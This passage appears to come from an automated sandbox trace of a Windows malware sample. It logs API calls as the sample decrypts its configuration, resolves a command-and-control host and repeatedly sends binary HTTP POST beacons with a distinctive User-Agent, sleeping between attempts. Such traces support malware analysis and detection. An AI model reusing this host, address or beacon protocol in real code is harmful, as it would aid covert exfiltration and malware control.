Flags=0x0, Size=0x24) returned 0x8708a8 [0271.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.164] CryptImportKey (in: hProv=0x86f930, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4b0) returned 1 [0271.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.164] CryptSetKeyParam (hKey=0x87e4b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0271.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.203] CryptSetKeyParam (hKey=0x87e4b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.203] GetProcessHeap () returned 0x840000 [0271.203] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0271.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.205] CryptDecrypt (in: hKey=0x87e4b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcf8, pdwDataLen=0x19f9a4 | out: pbData=0x87fcf8, pdwDataLen=0x19f9a4) returned 1 [0271.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.206] CryptDestroyKey (hKey=0x87e4b0) returned 1 [0271.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.207] CryptReleaseContext (hProv=0x86f930, dwFlags=0x0) returned 1 [0271.207] GetProcessHeap () returned 0x840000 [0271.207] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0271.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.209] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0271.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.210] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0271.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.211] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0271.211] GetProcessHeap () returned 0x840000 [0271.211] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0271.211] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0271.213] GetProcessHeap () returned 0x840000 [0271.213] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0271.213] socket (af=2, type=1, protocol=6) returned 0x3fc [0271.213] connect (s=0x3fc, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0271.278] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0271.278] GetProcessHeap () returned 0x840000 [0271.278] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0271.278] GetProcessHeap () returned 0x840000 [0271.278] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0271.279] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0271.280] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0271.280] GetProcessHeap () returned 0x840000 [0271.280] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0271.280] GetProcessHeap () returned 0x840000 [0271.280] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0271.280] GetProcessHeap () returned 0x840000 [0271.280] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0271.280] GetProcessHeap () returned 0x840000 [0271.280] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0271.281] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0271.282] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0271.282] GetProcessHeap () returned 0x840000 [0271.282] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0271.282] GetProcessHeap () returned 0x840000 [0271.282] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0271.282] send (s=0x3fc, buf=0x873a58*, len=237, flags=0) returned 237 [0271.282] send (s=0x3fc, buf=0x87eb58*, len=159, flags=0) returned 159 [0271.282] GetProcessHeap () returned 0x840000 [0271.282] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0271.282] recv (in: s=0x3fc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0271.631] GetProcessHeap () returned 0x840000 [0271.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0271.631] GetProcessHeap () returned 0x840000 [0271.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0271.631] GetProcessHeap () returned 0x840000 [0271.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0271.631] GetProcessHeap () returned 0x840000 [0271.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0271.631] closesocket (s=0x3fc) returned 0 [0271.631] GetProcessHeap () returned 0x840000 [0271.632] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0271.632] GetProcessHeap () returned 0x840000 [0271.632] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0271.632] GetProcessHeap () returned 0x840000 [0271.632] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0271.632] GetProcessHeap () returned 0x840000 [0271.632] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0271.632] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x11ec) returned 0x3fc [0271.634] Sleep (dwMilliseconds=0xea60) [0271.635] GetProcessHeap () returned 0x840000 [0271.635] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0271.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.636] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0271.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.642] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0271.649] GetProcessHeap () returned 0x840000 [0271.649] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0271.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.650] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0271.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.652] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0271.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.653] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.653] GetProcessHeap () returned 0x840000 [0271.653] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0271.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.654] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0271.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.655] CryptDestroyKey (hKey=0x87e670) returned 1 [0271.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.658] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0271.658] GetProcessHeap () returned 0x840000 [0271.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0271.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.659] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.660] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.661] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.662] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.663] GetProcessHeap () returned 0x840000 [0271.663] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0271.663] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0271.674] GetProcessHeap () returned 0x840000 [0271.675] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0271.675] GetProcessHeap () returned 0x840000 [0271.675] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0271.675] GetProcessHeap () returned 0x840000 [0271.675] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0271.675] GetProcessHeap () returned 0x840000 [0271.675] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f950 [0271.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.676] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0271.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.681] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0271.688] GetProcessHeap () returned 0x840000 [0271.688] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0271.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.689] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0271.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.690] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0271.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.691] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.691] GetProcessHeap () returned 0x840000 [0271.691] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0271.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.692] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f950, pdwDataLen=0x19f9a4 | out: pbData=0x87f950, pdwDataLen=0x19f9a4) returned 1 [0271.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.693] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0271.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.693] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0271.694] GetProcessHeap () returned 0x840000 [0271.694] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0271.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.694] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0271.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.695] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0271.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.696] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0271.696] GetProcessHeap () returned 0x840000 [0271.696] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0271.697] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0271.698] GetProcessHeap () returned 0x840000 [0271.698] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0271.698] socket (af=2, type=1, protocol=6) returned 0x404 [0271.698] connect (s=0x404, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0271.766] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0271.766] GetProcessHeap () returned 0x840000 [0271.766] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0271.766] GetProcessHeap () returned 0x840000 [0271.766] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0271.767] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0271.768] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0271.768] GetProcessHeap () returned 0x840000 [0271.768] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0271.768] GetProcessHeap () returned 0x840000 [0271.768] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0271.768] GetProcessHeap () returned 0x840000 [0271.768] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0271.768] GetProcessHeap () returned 0x840000 [0271.768] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0271.769] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0271.769] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0271.770] GetProcessHeap () returned 0x840000 [0271.770] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0271.770] GetProcessHeap () returned 0x840000 [0271.770] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0271.770] send (s=0x404, buf=0x873a58*, len=237, flags=0) returned 237 [0271.770] send (s=0x404, buf=0x87eb58*, len=159, flags=0) returned 159 [0271.771] GetProcessHeap () returned 0x840000 [0271.771] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0271.771] recv (in: s=0x404, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0272.123] GetProcessHeap () returned 0x840000 [0272.123] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0272.123] GetProcessHeap () returned 0x840000 [0272.123] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0272.123] GetProcessHeap () returned 0x840000 [0272.123] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0272.123] GetProcessHeap () returned 0x840000 [0272.123] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0272.123] closesocket (s=0x404) returned 0 [0272.124] GetProcessHeap () returned 0x840000 [0272.124] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0272.124] GetProcessHeap () returned 0x840000 [0272.124] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0272.124] GetProcessHeap () returned 0x840000 [0272.124] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0272.124] GetProcessHeap () returned 0x840000 [0272.124] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0272.124] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x8a0) returned 0x404 [0272.126] Sleep (dwMilliseconds=0xea60) [0272.128] GetProcessHeap () returned 0x840000 [0272.128] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0272.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.129] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0272.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.194] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f930) returned 1 [0272.218] GetProcessHeap () returned 0x840000 [0272.218] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0272.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.220] CryptImportKey (in: hProv=0x86f930, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0272.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.221] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0272.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.222] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.222] GetProcessHeap () returned 0x840000 [0272.222] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0272.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.223] CryptDecrypt (in: hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0272.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.225] CryptDestroyKey (hKey=0x87e430) returned 1 [0272.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.226] CryptReleaseContext (hProv=0x86f930, dwFlags=0x0) returned 1 [0272.226] GetProcessHeap () returned 0x840000 [0272.226] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0272.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.227] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.228] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.229] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.230] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.230] GetProcessHeap () returned 0x840000 [0272.231] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0272.231] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0272.231] GetProcessHeap () returned 0x840000 [0272.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0272.231] GetProcessHeap () returned 0x840000 [0272.231] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0272.231] GetProcessHeap () returned 0x840000 [0272.235] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0272.235] GetProcessHeap () returned 0x840000 [0272.235] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0272.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.237] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0272.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.244] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0272.252] GetProcessHeap () returned 0x840000 [0272.252] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0272.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.253] CryptImportKey (in: hProv=0x86fa40, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0272.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.255] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0272.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.256] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.256] GetProcessHeap () returned 0x840000 [0272.256] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0272.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.260] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0272.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.261] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0272.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0272.262] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0272.262] GetProcessHeap () returned 0x840000 [0272.262] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0272.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0272.264] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0272.265] LoadLibraryW (lpLibFileName="shlwapi") returned 